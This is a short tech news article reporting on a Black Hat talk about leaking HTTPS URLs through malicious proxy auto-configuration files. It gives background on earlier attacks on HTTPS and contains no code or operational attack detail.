Flaw in HTTPS encryption enables network operators to eavesdrop on web users

Windows, Linux and Mac users equally at risk

A newly discovered flaw in the HTTPS encryption enables network operators to eavesdrop on web users' browsing.

The attack works by bypassing the HTTPS encryption, which is supposed to prevent this happening. HTTPS would normally prevent the operator seeing the URLs visited by users, but a new technique abuses web proxy auto-discovery and exposes browser requests to any code the network owner wants to throw at it.

Itzik Kotler, chief technology officer and co-founder of security company SafeBreach, along with Amit Klein, vice president of security research at the same company, will demonstrate how the attack works at next week's Black Hat conference in a talk entitled 'Crippling HTTPS with Unholy PAC'.

"We will demonstrate that, by forcing your browser/system to use a malicious PAC (proxy auto-configuration) resource, it is possible to leak HTTPS URLs," the pair wrote on the Black Hat site.

"We will explain how this affects the privacy of the user and how credentials/sessions can be stolen. We will present the concept of 'PAC malware' (a malware which is implemented only as JavaScript logic in a PAC resource) that features a two-way communication channel between the PAC malware and an external server, contextual phishing via messages, denial-of-service options, and sensitive data extraction from URLs.

"We present a comprehensive browser PAC feature matrix and elaborate more about this cross-platform (Linux, Windows, Mac) and cross-browser (IE, Chrome, Safari) threat."

This isn't the first time that the HTTPS protocol has allegedly been cracked. Documents released by whistleblower Edward Snowden showed that the US National Security Agency has been at it for years by exploiting certain variations of the Diffie-Hellman key exchange algorithm, a common way to exchange cryptographic keys over untrusted channels.

A story emerged earlier this year suggesting that internet users could bypass ISP blocks on torrent sharing and other media streaming sites of dubious legality simply by adding an 's' to the end of 'http' in the address.